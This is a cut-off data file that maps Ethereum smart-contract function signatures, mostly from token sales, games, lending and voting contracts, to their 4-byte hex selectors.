"thirdDiscountPrice()": "0x4cf76cca", "numberOfPledges()": "0x2a8ec8cc", "RATE_ETH_WXW()": "0x2887318f", "getMaximumContributionPossible()": "0xaa6217eb", "stage_1_price()": "0x6e0f8d68", "PRIVATE_SALE_POOL()": "0x6254add1", "howManyEtherInWeiToKillContract()": "0x7b8cfbe1", "certbot()": "0xa75261f2", "diamondAuction()": "0x3910814b", "stopICO_20_March()": "0xc7a96920", "monthlyMinting()": "0xb69147f2", "collectionFees()": "0x2342293d", "buysTokens()": "0xb1099347", "monsterCreator()": "0xaddb51ff", "activateToken()": "0xf957417e", "vestTime()": "0x4d22d1d1", "communityTokensCap()": "0xa8e3a6b6", "is_started_payouts()": "0x62eb4c89", "tokensPercentageForKeyHolder()": "0x4398da85", "RESERVED_ECOSYSTEM_GROUP()": "0x96cb4bc5", "buyXid()": "0x658577e9", "tokenFunded()": "0xb9b237c2", "votesDecline()": "0xd8055812", "vote_for_candidate_D_for_Free()": "0x0f183119", "openIco()": "0x846786f1", "finishLottery()": "0x2c906ba2", "vestingPeriodTime()": "0xb2d27832", "getEtherPriceforDapp()": "0x7cdd8419", "tub()": "0x34e70cc2", "highestPrice()": "0x0e8670e0", "Wallet5()": "0xe4340e6a", "initial_disbursement()": "0x8b1d67f9", "preSaleGoalReached()": "0x468b0fcd", "CORReserveAccount()": "0xdd9a9e2c", "infraEthWallet()": "0xb3710a80", "getBurnedItemCount()": "0x40400fa7", "isBuyBackOne()": "0x7ea31ded", "getTier()": "0x5ad701c2", "tokens_sold()": "0x77231e6c", "managerAddr()": "0x2e3c9e99", "INVESTOR1()": "0xf5459d6b", "setPriceFee()": "0x1a24b91a", "RegisterContract()": "0xc1ec4a2a", "allowRecovery()": "0x19d0f54d", "getLastBetNumber()": "0xea4b9dce", "getPresaleStatus()": "0xd7517caa", "bankManager()": "0xe9e2990e", "monsterAuction()": "0xb43c19a6", "totalHolder()": "0xf11745df", "finalReserveAllocation()": "0x342c17cd", "lastActiveTs()": "0x7b294495", "roundInterval()": "0x82f8b6e9", "REPUTATION_DECIMALS()": "0xf2cba6a6", "ETHAssets()": "0x45e5da07", "COMPANY_TOKENS_LOCK_PERIOD()": "0x51ae7f95", "dragonGirlLotteryPrice()": "0x5f5a98ee", "transferLimit()": "0xf9432517", "timeOfLastIncrease()": "0xdfbb70c9", "MAXIMUM_CAP()": "0x2c4c2719", "skinCreatedNum()": "0xefce828e", "CROWD_WEEK4_PERIOD()": "0x940c17c0", "getStageEtherRaised()": "0xda31cf2a", "preIcoMin()": "0x1f101520", "icoSoftcap()": "0x59c4e612", "mintingStopped()": "0xf339292f", "CLASS_PLANT()": "0x80e183a3", "maxPrivateSaleStage()": "0xb8f53f36", "GOLD_TO_COLLECT_1SWORD()": "0x53ca1aa8", "policiesCount()": "0x0b100a5a", "oneCentInWei()": "0xa99df9c3", "oraclizeCallbackGasLimit()": "0xe14ca10e", "TIER4_PRICE()": "0x082b57e9", "ERC223Transfer_enabled()": "0xfb471ce5", "totalAvailableForSale()": "0xe7eaaa05", "DGT_contract()": "0x6475e47d", "initAddress()": "0x7be1e747", "PREISSUED_AMOUNT()": "0x1e7e4b5e", "_privateSale()": "0xd632f639", "linkedContract()": "0xe11527d4", "coinOwner()": "0x9976d32a", "richestPlayer()": "0xfc1b8a7e", "maxCharId()": "0x0558171d", "FOUNDATION_POOL_ADDR_VEST()": "0xe565b387", "roundid()": "0xff840553", "institutionWallet()": "0x77cc437c", "decimal_precission_difference_factor()": "0x22c66ae7", "dividendsPerShare()": "0xe2d2e219", "PhoenixExchangeFund()": "0x8c812c51", "VREO_SALE_CLOSING_TIME()": "0xdb83d02f", "getAssetBalance()": "0x183b3159", "STAGE_1_MAXCAP()": "0xecb42914", "STARTING_ASSET_BASE()": "0x524a8131", "topup()": "0x69774c2d", "MAX_OWNER_COUNT()": "0xd74f8edd", "LIMITED_ADMIN()": "0x9f3f736a", "ORACLIZE_GAS_LIMIT()": "0x4eb8ffb4", "stage3Sale()": "0x5431dfb8", "first_bonus_duration()": "0xaec2f2d9", "tokenPriceProvider()": "0x0ade4942", "originalSupply()": "0x4b2ba0dd", "crowdsaleAddress()": "0x31d2f891", "PRICER_DELAY()": "0xed6b40c0", "chfCentsPerEth()": "0x705f4630", "extendedTime()": "0x256a9f81", "FOUNDERS_VESTING_DURATION()": "0xa85ade82", "ico3cap()": "0x491737f2", "aidPoolTokens()": "0x450531e7", "creditMcAddress()": "0xdfd5d3b0", "ROUND_1_PRESALE_BONUS()": "0xfb979ba2", "MAX_TOTAL_AMOUNT_GET_ETH()": "0xf081fc2e", "updateUsersList()": "0x836e9431", "GetGuestCount()": "0x609bf6ba", "MosesToken()": "0xfc891b97", "_init()": "0xb349b973", "ZarfundsToken()": "0x3c173bf0", "KOIN(uint256,string,uint8,string)": "0x76cb69e9", "KudanilToken()": "0x66b4ad74", "Paradime01()": "0x5347d58c", "NassauToken()": "0xde840f11", "depositToTWI(uint256)": "0x40beafc9", "setAccompliceBContract(address)": "0x14852606", "VaporCoin()": "0x77c90dd4", "transferMulti(address[])": "0x4d492b50", "VersumToken(uint256,string,string)": "0x809f8cc9", "airdropTokens(address[],uint256[])": "0x706f6937", "ZZZCoinDistribution()": "0xb3b4b21e", "ZZZCoinERC20Token()": "0x3c6d736d", "extendICO(uint256)": "0xb1d006d6", "startICO(uint256,uint256,uint256,uint8)": "0x817c1e52", "setTokenSupplier(address)": "0x4bf1b68d", "setTokenSupplierAddress(address)": "0x631407a2", "setInitialData(address)": "0x1f6ee77a", "Mejasa()": "0xe98799e0", "createtoken(string,string,string,address)": "0xce098093", "PetCoin()": "0x32b693b0", "createERC20TokenNetwork(address,address)": "0x435a1220", "RITToken()": "0xb764311d", "cheat()": "0xaa1b510e", "changeFlipper(address)": "0x9539ed7e", "YTTD()": "0x639ab80b", "NoBsCrypto()": "0x034d0834", "RenaS()": "0x0c345385", "VUTEST2()": "0x3e1eab35", "createDonationsBank()": "0x357ee486", "createNormalBank()": "0x744b4b3f", "GuessTheRandomNumberChallenge()": "0x57536e64", "BitCharity()": "0x8ec48bcb", "FastmarketNetwork()": "0x1930fc01", "PerpetualTestCoin()": "0xf2e650ff", "LUC()": "0xff07061b", "emission(address)": "0xc85f6a80", "changeProductionFee(uint256)": "0x1cf081f6", "changeProductionFeeRecipient(address)": "0x8d121247", "createBasket(string,string,address[],uint256[],address,uint256)": "0x8afa7c6a", "BasketFactory(address,address,uint256)": "0xf5ac0b6b", "changeArrangerFee(uint256)": "0x7bf92690", "changeArrangerFeeRecipient(address)": "0x11247233", "debundle(uint256,address,address)": "0x05401284", "debundleAndWithdraw(uint256)": "0xed20f370", "depositAndBundle(uint256)": "0xb1cc1d4d", "createtoken(string,string,string,string,string,string,address)": "0x062db578", "UniversalGamingCoin()": "0x55fb9765", "claimTokenOwnership()": "0x10731a65", "setFiatRaisedConvertedToWei(uint256)": "0x56277619", "deleteGrantee(address)": "0xd316e912", "addUpdateGrantee(address,uint256)": "0xaf1034ab", "getTotalFundsRaised()": "0x0c3e2d2d", "LeadcoinSmartToken()": "0x3cb6e20c", "setDestroyEnabled(bool)": "0x5005ba47", "DeltaToken1()": "0xefd2fb9b", "getTranslationLanguageList()": "0x70ac62ec", "getEpisodeList()": "0x3628ca60", "getSupportersAddress()": "0x51ea468b", "addTranslatorContent(address)": "0x4c04f7f2", "addEpisode(address)": "0x85f67ae4", "setTranslatorRate(uint256)": "0x095e89ac", "setMarketerRate(uint256)": "0xe701d051", "setTitleImage(string)": "0x80caac1d", "setGenres(string)": "0x7f23fb92", "setSynopsis(string)": "0x1cdeae52", "setContentName(string)": "0x5135077b", "setFundraising(address)": "0xe723a8f9", "setWriter(address)": "0x39e20523", "addSupporter(address)": "0xd783b53b", "resetContent(string,address,string,string,string,uint256,uint256)": "0xd97a9c39", "setDecimal(uint8)": "0x1a9a0426", "setInitialSupply(uint256)": "0x61402596", "Yangshuai(uint256,string,uint8,string)": "0x510ae121", "PlynToken()": "0xa3d5ec39", "IotcToken(uint256,string,uint8,string)": "0x611a20ae", "bytesToString(bytes,bytes1)": "0x3313d9bf", "getLogo()": "0x0b6700d6", "create(uint256[],uint256[])": "0x633c78b5", "verify(uint256[],uint256[])": "0xb864f5a9", "price(uint256[],uint256[])": "0x0579d25d", "addAsset(uint256,uint256,bytes)": "0xf762e147", "KARMAtoken()": "0xfced6ad2", "ERC20(string)": "0xc47958e2", "decrementCounter()": "0xf5c5ad83", "incrementCounter()": "0x5b34b966", "NSCBurnToken()": "0x3aec4439", "Huangdashi(uint256,string,uint8,string)": "0x69719706", "JobitToken()": "0xb7bb208b", "iOSCoin()": "0xc25ab8b0", "SucToken()": "0x4e59f947", "setBoolF1F2F3(bool,bool,bool)": "0x11d36c4f", "setBoolF1F2(bool,bool)": "0x848f002f", "setArrBoolField1(bool[])": "0x1a009265", "setArrUintField1(uint256[])": "0xfc6d1892", "setArrIntField1(int256[])": "0x9bb3bcaa", "bar(string,string)": "0x39eabf7f", "functionName(bytes32)": "0x88b7a17c", "functionName(bytes20,address)": "0x9642ccdf", "getMessages()": "0x5ff6cbf3", "getRecipients()": "0xd78d610b", "getChats()": "0xc6381649", "getCreateMarketDesignatedReporterAddressValue()": "0xc5132a5c", "getCreateMarketCreatorValue()": "0xac79a4b1", "getCreateMarketDenominationTokenValue()": "0x651006c0", "getCreateMarketfeePerEthInWeiValue()": "0xac9b5c30", "getCreateMarketNumTicksValue()": "0x0a95011e", "getCreateMarketNumOutcomesValue()": "0x4215a39b", "getCreateMarketEndTimeValue()": "0xb139560b", "getCreateMarketUniverseValue()": "0x90828cdd", "getCreateMarketController()": "0xfa3a0f78", "isAllowedOverrideAddress(address)": "0x710cba8b", "MockToken(uint256)": "0x19e044f8", "LegacyRepContract()": "0xec27f6d8", "getBuyerInstanceAddress(address)": "0xaea9b438", "getInstanceAddress(address)": "0x213fe044", "endInstance(address,address)": "0x6985a1b0", "releaseFunds(bool)": "0x24850e10", "createInstance(bytes32,bytes32,address,bytes,bytes32,bytes32,address,bytes,bytes32,uint256,uint256,bytes)": "0xd0ccf4bc", "privatized(bytes32,bytes32)": "0x0ef71d79", "validate(uint256,bytes32,address,bytes32,bytes32)": "0xebe89597", "setKey(bytes32)": "0xc3d2c355", "oraclize_query(string)": "0x6dd5bb11", "__update_oraclize(address)": "0xc116574c", "query(string)": "0x7c261929", "payBounty()": "0x83e83b54", "exchange(address,uint256,uint256)": "0x236e06f6", "setExchangeRateOracle(address)": "0x41d8bc5f", "USDExchange(address)": "0x1be0f793", "allocateEther(uint256,address)": "0x422dabac", "moveFloor(uint256)": "0xd726755b", "moveCeiling(uint256)": "0x6e596aef", "MarketEnabled(address,address,address)": "0x642289f2", "testCanSendEthToContractWhenCrowdsaleInProgress()": "0xa0c8e0ff", "TestCrowdsale_Noname()": "0x9d9cc8e9", "Presale(address,uint256,uint256)": "0x75bf4777", "refreshScore(uint8,bytes32)": "0xa9018896", "updateScore(uint8,bytes32,uint24)": "0x287977d6", "getScore(uint8,bytes32)": "0xdd4198f4", "updateAccount(uint8,bytes32,bool,bytes32)": "0xc0056b7b", "linkAccount(uint8,string,string)": "0xc7120bad", "unlinkAddress(address)": "0xb59284ac", "linkAddress(address)": "0xc7097f62", "unbindEthereumAddress(address,bytes32)": "0xa923ebac", "bindEthereumAddress(address,bytes32)": "0x1fff5c2f", "Storage()": "0xee3711be", "getTradeCount()": "0xa3031b77", "getTradeByIndex(uint256)": "0x11cec8f0", "getTradeByReferenceCode(bytes32)": "0x164ceb70", "certifyTradeAsCounterparty(bytes32,address)": "0xe9841bd8", "createTrade(bytes32,uint256,uint256,address,address)": "0x024858b1", "getTradesByAddress(address)": "0xb4144b79", "TradeRegister()": "0xbe621764", "SoccerBet(address,address)": "0x3994b883", "pai_add(string,string)": "0xe536f869", "issue(address,uint256,string,string)": "0x64f018d8", "TransferableMeetupToken(string,string)": "0x97d3624c", "xfer(address,address,uint256)": "0xc7ae9632", "endTokenSale()": "0x307edff8", "setParticipationCap(address[],uint256)": "0x83d880d0", "unregisterUsers(address[])": "0xe42d6efa", "registerTier2Users(address[])": "0xbbb37f76", "registerTier1Users(address[])": "0xa0a695fe", "issueRefundIfNecessary(uint256)": "0xe81a6c58", "getNumberOfTokensToIssue(uint256)": "0xe078c549", "issueTokensToBuyer(uint256)": "0x67016c14", "transferWeiToWallet(uint256)": "0xd699c00e", "getWeiValue()": "0x685705ae", "tokensAreAvailable()": "0x488cec69", "isBeforeEndTime()": "0x887d23a6", "isAfterStartTime()": "0xa92ec661", "tokensAvailable()": "0x60659a92", "KudosTokenSale(address,uint256,address)": "0xc14634cf", "getReceiptRoot(bytes32)": "0xad562965", "getTxRoot(bytes32)": "0xd6bacb0e", "getStateRoot(bytes32)": "0x2cb58378", "checkProof(bytes32,bytes,uint256[],bytes,bytes)": "0xb44996c4", "checkReceiptProof(bytes32,bytes,uint256[],bytes,bytes)": "0xc28a56f1", "checkTxProof(bytes32,bytes,uint256[],bytes,bytes)": "0x5f1d804f", "checkStateProof(bytes32,bytes,uint256[],bytes,bytes)": "0x003271d5", "submitBlock(bytes32,bytes)": "0xfab5ccb1", "calculatedPaymentInterval()": "0x0fce00ed", "contractorWithdraw()": "0x7db12abc", "contracteeWithdraw(uint256)": "0x83393882", "purchase(string)": "0x59f5e0ce", "contracteesSize()": "0xb9a5e073", "getNextPaymentDate()": "0x09c12ccb", "TimeClock(string,uint256,uint256,uint256,uint256)": "0xfa556996", "newProposal(address,uint256,bytes32,bytes32)": "0x734ce665", "getSalary(string)": "0xe42c1337", "closingAddress()": "0x53af5d10", "settled()": "0x8f775839", "closed()": "0x597e1fb5", "opened()": "0x5f88eade", "assetAddress()": "0x1ba46cfd", "settleTimeout()": "0x7ebdc478", "cashback()": "0x242fc36e", "getUserReferralsProfit(address)": "0x937ef8e3", "getUserReferrals(address)": "0x575cea6b", "getUserWithdrawnBalance(address)": "0x2713a1b4", "getUserPayoutBalance(address)": "0x09ad1c47", "getUserInvestBalance(address)": "0xb560d589", "ABTCETHER()": "0x844891a0", "_getMinAuctionStartPrice()": "0xd8132807", "_getInitAuctionSeconds()": "0xa98ee0b7", "_getMaxAuctionSeconds()": "0x68b07ebb", "_getMinAuctionSeconds()": "0x51afc4af", "_getGameAuctionGap()": "0x6096bbde", "_getGameStartAuctionMoney()": "0x47387404", "_getGameInfoPart2(uint256)": "0x7415fbdb", "_getGameInfoPart1(address,uint256)": "0x235bd895", "getGameDataByIndex(uint256)": "0xf276f36b", "getCurrGameInfo()": "0xbb45d09d", "getCurrCanRefund()": "0x185e4a00", "gameRoundEnd()": "0xdd66111d", "_claimReward(address,uint256)": "0x1c6ba386", "getMinAuctionValue()": "0xf79f528b", "_startNewRound(address)": "0x6ad0d6ce", "_inMoney(uint256)": "0xca2a2f99", "setOracleAPIAddress(address)": "0x1c7106e6", "addAuctionReward()": "0xc39e7394", "adminAddMoney()": "0x10937b5a", "getRandomForContractClanwar(uint256,uint256)": "0x536253a9", "getRandomUint256(uint256)": "0xa23b5bd1", "getEtherDiceProfit(uint256)": "0x5bd7c609", "getRandomForContract(uint256,uint256)": "0xa0f4d3df", "getRandomUint(uint256)": "0x851645e6", "transferTokensFromReserveAddress(address,uint256)": "0xe148fe28", "transferTokensFromRetailersAddress(address,uint256)": "0xa4b16449", "transferTokensFromMarketingAddress(address,uint256)": "0x2067c85c", "transferTokensFromTeamAddress2(address,uint256)": "0x944f0499", "transferTokensFromTeamAddress1(address,uint256)": "0x47c55045", "setKYCpassed(address)": "0xd2cdf580", "kycPass(address)": "0xec3d21e1", "IRCToken()": "0x0583ae52", "distributeTratok(address[],uint256[])": "0xdb74847d", "BigchatToken(uint256,string,uint8,string)": "0xce2777a3", "calculateValue(uint256,uint8)": "0xa0d0be4f", "setDoubleRewardEndTime(uint64)": "0xad7554d9", "get(address,uint256)": "0xb464631b", "start_quiz_game(string,string)": "0xb96d64fb", "participant2SentEtherCount()": "0xff75567b", "participant1SentTokensCount()": "0xe487fdb6", "transferAllToOwner()": "0x24e581be", "getLevelsCount()": "0x38756a89", "getLevelByIndex(uint256)": "0x4d894d24", "getLevelAmount(uint256)": "0x478cd032", "clearLevels()": "0xe7bfdc93", "replaceLevel(uint256,uint256,uint256)": "0x60196008", "removeLevel(uint256)": "0x7c23d1cb", "addLevel(uint256,uint256)": "0x88eccb09", "executeProposal(bytes32)": "0x980ff6c6", "getClout(address)": "0x04aca4bc", "rescindVote(bytes32)": "0xe682c9ea", "untokenize()": "0x2d6d1646", "setManagementCompany(string)": "0xc3e2087c", "registryProxy()": "0x218d984b", "lastTransferBlock(address)": "0x8712523e", "emitGenericProposal(string)": "0xe5e5e5d6", "doMidnightRun()": "0x49c53b2d", "collectPayoutForAddress(address,address)": "0x418d4dcc", "collectPayout()": "0xc629cdf4", "getNextPayoutTime()": "0xfafbb9a3", "addToMidnightPrize()": "0x0dba2400", "doApprove(address,address,uint256)": "0xdfc4a516", "mintMarginTokens(bytes32,address[7],uint256[8],uint32[2],bool,bytes,bytes)": "0xce3d9237", "VibeXChainToken()": "0x00b5152b", "addTestimony(address)": "0xae748837", "addDadRelation(address)": "0x26d2b840", "addMomRelation(address)": "0x184fd65e", "updateIdentitySocialURL(address,bytes32)": "0x688fad5d", "updateIdentityImageURL(address,bytes32)": "0xa40cee9c", "newIdentityL1(address,bytes32,bytes32,bytes32,bytes32,uint256)": "0x166ee1de", "getEntityCount()": "0x5d1b45b5", "getDad(address)": "0x5afc250f", "getMom(address)": "0x24064617", "isEntity(address)": "0x14887c58", "setMinReserve(uint256)": "0x3deb91c7", "orphantoken(address)": "0x80bf099e", "SDEToken(uint256,string,string)": "0x1fe07274", "deregisterToken(uint32)": "0x25fc575a", "registerToken(uint32,address,uint8)": "0x9e20a9a0", "updatePrincipal(uint256,uint256,bool)": "0x71d5d1c2", "updateAvailable(uint256,uint256,bool)": "0x8f4dc0d1", "setCriticalBucket(uint256)": "0xb35e7d45", "withdrawHeldToken(uint256,uint256,uint256,uint256)": "0x4b5fd350", "withdrawOwedToken(uint256,uint256,uint256)": "0x606aed30", "withdrawSingleBucket(address,uint256,uint256,uint256)": "0x37a5ae1f", "accountForIncrease(uint256,uint256)": "0x57bf66d4", "accountForClose(uint256)": "0xd9ead22b", "rebalanceBucketsInternal()": "0x5f4ed0b1", "forceRecoverCollateralInternal(address)": "0x8cc17117", "getBucketOwedAmount(uint256)": "0x45a2556c", "getCurrentBucket()": "0xcd4c4c0c", "withdraw(uint256[],uint256[],address)": "0x456a09c8", "rebalanceBuckets()": "0xd92ed48d", "MARKETING_SHARE()": "0xf42c0f02", "lastLargestHODLER()": "0xd470097c", "multiplierPercent()": "0xb55a7d45", "returnWallet()": "0x7e4a1731", "maximalIndividualContribution()": "0xb9908cbb", "endDateICO()": "0x0238b770", "SECOND_PHASE_PRICE_FACTOR()": "0xff615b87", "MAX_NUM_NAVITOKENS()": "0xc41e1d4f", "getBurnAmount()": "0xd0c5c585", "PRE_SALE_30_BONUS_MIN()": "0xf2ba810e", "news()": "0x5144417c", "marketingSupply()": "0x624bb58f", "pps()": "0x0018b1d3", "ownerWithdrawUnclaimedCredits()": "0x2d475386", "icoTokenAddress()": "0x3ed72caf", "nextGameRakePercent()": "0x7da7d5ab", "roundThreeAmount()": "0xf80af907", "smartContractStartDate()": "0x63feeaaf", "allowsSignup()": "0x6dd4c13c", "currJackpotBetID()": "0xd505c1cf", "changeOwner()": "0x62a09477", "sentSecond()": "0x3c11f969", "totalSupplyInWei()": "0x4a58cf22", "product3_luckybuyTracker()": "0x7a4843ca", "remainPackage()": "0x12dcb676", "MaxMinersXblock()": "0x58aabdf8", "amountOfMeatInUnicorn()": "0x16b86ed8", "sellMyTokensElixir()": "0x2496b796", "maxGamble()": "0x8cd4fdf1", "balanceManager()": "0x416e6d5e", "minWeightDeduct()": "0x60299843", "yoshicoin()": "0x5dcb71f2", "priceProgression()": "0xbbc94fda", "PHASE5_START_TIME()": "0x9845b448", "canBurnAddress()": "0x5af4cd99", "WHITELIST_BONUS_RATE()": "0xa302fdf1", "PRE_SALE_30_ETH()": "0xebe74b21", "isInitialAllocated()": "0x0474d4a4", "preBuyPrice3()": "0xeed04e69", "coinsCount()": "0x455ef8f9", "advisoryReserveTokensDistributed()": "0x0c7f076e", "lock_period()": "0xf83e9a20", "hasAllocated()": "0x538811cf", "API()": "0x7d7b0099", "allocated18Months()": "0x9b743cbd", "stakeholdersPoolAddress()": "0x55b1182c", "transfer_funds_to_project()": "0xaf9b1cef", "thirdPreSaleEndDate()": "0x8125fc44", "crowdSaleStartTimestamp()": "0x4fa6a6d5", "confirmOneBuy()": "0x17adfa08", "numGamesCompleted()": "0xb0545532", "deadlineParticipation()": "0xcafaed51", "codexStakeContract()": "0x90e7a074", "getRealUsdAmount()": "0x6f3640f7", "startTimeTwo()": "0x4e9f9d37", "totalAdvisor()": "0x396d1ddf", "finishChampionGame()": "0x84b83a96", "FOUNDERS_LOCK_PERIOD()": "0x14cc3cf9", "endFirstDayICO()": "0xee27ab57", "timestampEnd()": "0x041abd9f", "distributionSupply()": "0x21575889", "yesContract()": "0xd3604bc9", "bonusStep()": "0x46804137", "timeBetweenEditions()": "0x96e1a657", "preICOcollected()": "0x6140af43", "totalAcorns()": "0xc60f56b2", "number()": "0x8381f58a", "EMPTY_RESOURCE_SET_ID()": "0x65061957", "shopSettings()": "0xa52c34c3", "bids_count()": "0x00a7fdfc", "ActorCoin()": "0xd3a3086e", "revenueShareOwnerAddress()": "0x455d86b8", "financePeriodsCount()": "0xf45b96a0", "minActivatedToken()": "0xf9715458", "regulatorStatus()": "0xec85d2f2", "ALLOC_ADVISORS()": "0x220e693f", "ETH_MIN_GOAL()": "0x0aeffa65", "MAX_AMOUNT()": "0xd40dc870", "feeDeposit()": "0xabca7290", "currentLoanPerson()": "0x36988bc4", "sumMultiplayer()": "0x83c7d7c1", "freezePeriod()": "0x0a3cb663", "withdrawEthers()": "0x687e6f44", "PRESALE_LEVEL_3()": "0x7530b54d", "initialFundBalance()": "0x4b6dfe4e", "currentIcoPeriodStartDate()": "0x18289482", "DaoRules()": "0x8fd9f1b4", "email()": "0x820e93f5", "privateSaleAmount()": "0x8b2b423a", "AgriChainCultivation()": "0xd3257034", "vaultNum()": "0x415eea1b", "totalEtherCookieResearchPool()": "0xb429f65a", "IcoTotalSupply()": "0x363db35d", "saftInvestorAllocation()": "0x91970cba", "lastBidder()": "0x8547af30", "preSaleHardCap()": "0x09738d25", "devexit()": "0x3e904876", "xdest()": "0xe5a912c7", "inSale()": "0x8008d5bc", "PRESALE_LEVEL_4()": "0x02c6f427", "parentFees(address)": "0x36b69367", "parentChange(address)": "0xfdbda9a7", "HelloGoldToken(address)": "0xadb1ad42", "GBTAddress()": "0x6ad03feb", "setGBT(address)": "0xa3dd3aa7", "setHGT(address)": "0xc74a96eb", "DoNotDeployThisGetTheRightOneCosParityPutsThisOnTop()": "0xdbc2783d", "TenToken()": "0xee389b94", "DanetonToken()": "0x4027522c", "Hydrogen()": "0x403c617e", "HomeChain()": "0x57bcfc09", "BihuaToken()": "0x6109ff33", "BKEXComToken()": "0x50e14731", "VernamToken(uint256)": "0xbf25c597", "setVernamOriginalToken(address)": "0x7c3be5fb", "convertTokens(address)": "0x98806bf0", "convertYourTokens()": "0xc7e52480", "releaseThreeHotHourTokens()": "0x6cfff605", "Controller(address,address)": "0x864dd17d", "setKYCTeam(address)": "0xc152d3eb", "setBenecifiary(address)": "0x22bae392", "timeLock()": "0xd085835a", "setTimeForCrowdsalePeriods()": "0x532e87e4", "validatePurchase(address,uint256)": "0x556db16a", "unlockTokensAmount(address)": "0x805b90d6", "calculateTokensForMonth(address)": "0x432af6e9", "tokensCalculator(uint256,uint256,uint256,uint256)": "0xde628e3b", "getContributedAmountInWei(address)": "0x944358e0", "releaseThreeHotHourTokens(address)": "0x66894d76", "calculateAndCreateTokens(uint256)": "0x8cd25904", "activateCrowdSale()": "0xb456d9e2", "setMaxSale(uint256)": "0x08290dc5", "setMinSale(uint256)": "0x1270a4d3", "getAllDapps()": "0xaec5ab08", "getPointOf(uint256)": "0x86452295", "timeOf(uint256)": "0x60edc4c4", "initTimeOf(uint256)": "0x1ecc56f2", "timeArrayOf(uint256)": "0xe6259f53", "pointArrayOf(uint256)": "0x7bd3acbb", "pointOf(uint256)": "0xca54ea4e", "URLOf(uint256)": "0xc7946842", "descOf(uint256)": "0x4c1674e5", "buyPoints(uint256)": "0x58c9e484", "listDapp(string,string,string)": "0x7d1541ad", "adjustPointsDecayFactor(uint256)": "0x440961c3", "adjustL(uint256)": "0x44f2428a", "EtherIncognito()": "0x18ee9d5e", "withdrawalRange(uint256,uint256,address)": "0x867b79a1", "decimals(bytes32)": "0x5f18aa0c", "addCurrency(string,uint8)": "0xd9f3afff", "SJT()": "0x379119af", "setDeprecated(bool)": "0xd848dee7", "pay(uint256,uint256,address,bytes)": "0x355f41a9", "addInterest(uint256)": "0x3290f515", "calculateInterest(uint256,uint256,uint256)": "0x05e1bd8c", "getRawPendingAmount(uint256)": "0x990986dd", "destroyIdentifier(bytes32)": "0x4860165c", "registerApprove(bytes32,uint8,bytes32,bytes32)": "0x8248159e", "approveLoanIdentifier(bytes32)": "0x804d77c8", "getIdentifier(uint256)": "0xc172aae5", "getInterest(uint256)": "0x5fe2d689", "getExpirationRequest(uint256)": "0xe6c8fcf1", "getLenderBalance(uint256)": "0x55121498", "getCancelableAt(uint256)": "0xbed33cae", "getDuesIn(uint256)": "0x4a8e4d78", "getInterestRatePunitory(uint256)": "0x4d5e9a2a", "getInterestRate(uint256)": "0x0c196a74", "getInterestTimestamp(uint256)": "0x2924e254", "getPunitoryInterest(uint256)": "0x93806144", "tokenMetadataHash(uint256)": "0xf285f25c", "lockTokens(address,uint256)": "0xb1c25586", "supported(bytes32)": "0x7193f2f0", "addCurrency(string)": "0xa1d0a48f", "getRate(bytes32,bytes)": "0x3ae26afa", "transferTo(address)": "0xa03fa7e3", "claim(address,uint256,bytes)": "0x8f0bc152", "cost(address,uint256,bytes,bytes)": "0x477ce277", "url()": "0x5600f04f", "withdrawal(uint256,address,uint256)": "0xf24ff92c", "approveLoan(uint256)": "0xaadc1ac1", "cosign(uint256,uint256)": "0x6394536d", "getCurrency(uint256)": "0xcdf9b77e", "getPendingAmount(uint256)": "0x91cb98af", "isApproved(uint256)": "0x7910867b", "getApprobation(uint256,address,address)": "0x33195fca", "getDueTime(uint256)": "0x59357045", "getPaid(uint256)": "0x2a92362c", "getCreator(uint256)": "0xd48e638a", "getCosigner(uint256)": "0x964f61f9", "getBorrower(uint256)": "0x8500d919", "getOracle(uint256)": "0x10a9de60", "getTotalLoans()": "0x833be5d5", "CopyTokens()": "0x3eba223c", "hardCap()": "0xfb86a404", "transferMintOwnership(address)": "0x1861355b", "Licensium(uint256,string,uint8,string)": "0x7e0e471d", "BOBToken()": "0xe5da2717", "mintTo(uint256,address)": "0xb723b34e", "setCentsPerMonth(uint256)": "0x383fe6d3", "MiningToken(string,string)": "0xf1d02a8c", "recoverEthers()": "0xac99aa69", "EMoney(uint256,string,string)": "0x695d027b", "Wthdraw()": "0x8dd47d91", "WithdrawToInvestor(address,uint256)": "0x91b6a086", "TakeBack()": "0x06894f59", "CheckProfit(address)": "0x7a2c1b71", "InvestFund()": "0x08029105", "StartRefound(bool)": "0x9b9279ec", "SetThrdOwner(address)": "0xd25d19e2", "SetScndOwner(address)": "0x33c4a1d6", "initLoan()": "0x7ce67d60", "charge(address,uint256,uint256)": "0x54a9409e", "setFoundAcc(address)": "0x6be343cc", "setParter(address,uint256)": "0x0d9b71cc", "Zigger()": "0x82c7bf2f", "ImageCoin(uint256,string,string)": "0xacb6e626", "setSPARCAddress(address)": "0x33df4155", "SPARCPresale()": "0x94c62fb5", "ROLEX()": "0x167d219e", "getLinearRelease()": "0x82351b43", "getBaseLockPercent()": "0x9fb8dd1a", "getStopLockTime()": "0x6b27909d", "getStartLockTime()": "0xa24247f1", "getPoolBalance()": "0xabd70aa2", "setBpToken(address)": "0xb69ec629", "setRule(uint256,uint256,uint256,uint256)": "0x54573cfc", "AssetPool(address,uint256,uint256,uint256,uint256)": "0x48a5d7bb", "ownedPool()": "0x41ccf987", "setPoolAndAmount(address,uint256)": "0x14b11651", "getBaseAmount(address)": "0xb34c8afb", "getAssetPoolAddress(address)": "0x2f869d26", "isPool(address)": "0x5b16ebb7", "removePool(address)": "0x3b7d0946", "addPool(address)": "0xd914cd4b", "DRONEXTOKEN()": "0x59fc2ba4", "forwardEther(uint256)": "0xe2217114", "refundLeftOverWei(uint256,uint256)": "0x9ba33ab3", "calcCakAmount(uint256)": "0x00ea11ec", "unWhiteListInvestor(address)": "0x6244b7ed", "batchWhiteListInvestors(address[])": "0xa703c751", "whiteListInvestor(address)": "0xeeed1767", "batchMintPresaleTokens(address[],uint256[])": "0x3b4920b8", "CakCrowdsale(uint256,uint256,uint256,address)": "0x4c59f021", "HouseICO()": "0xa2866a78", "endEvent()": "0x86ec6177", "setWhitelistedAddressMain(address[],bool)": "0x618ce6d7", "setWhitelistedAddressPre(address[],bool)": "0xf24edfd6", "setMain(uint256,uint256,uint256,uint256,uint256)": "0x648ad97f", "setPre(uint256,uint256,uint256,uint256,uint256)": "0xc83068eb", "joinMain()": "0x9743c6c3", "joinPre()": "0xcf299d04", "LendingBlockTokenEvent(address)": "0x4da7c5d6", "setTransferableTime(uint256)": "0x95b3dc77", "LendingBlockToken(address)": "0x83f537cc", "calcAmount()": "0xdfcdde5e", "Presale(uint256,address)": "0x3d30276b", "PCNCrowdsale()": "0x746ac67e", "Vets()": "0xb6ecd81c", "NBW()": 